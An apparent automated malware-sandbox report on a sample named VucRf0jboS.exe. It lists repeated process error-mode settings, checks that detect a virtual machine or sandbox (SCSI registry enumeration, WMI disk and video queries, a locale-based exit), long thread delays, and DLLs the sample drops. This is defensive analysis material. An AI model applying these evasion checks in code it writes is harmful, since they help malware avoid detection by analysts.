Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-80948

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: A40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2410000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 20EE9020000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 20EEAAC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: D10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 29C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: D10000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4957
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 4623
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 5019

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39177

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssfwvk	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nkho	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\VucRf0jboS.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API coverage: 6.2 %
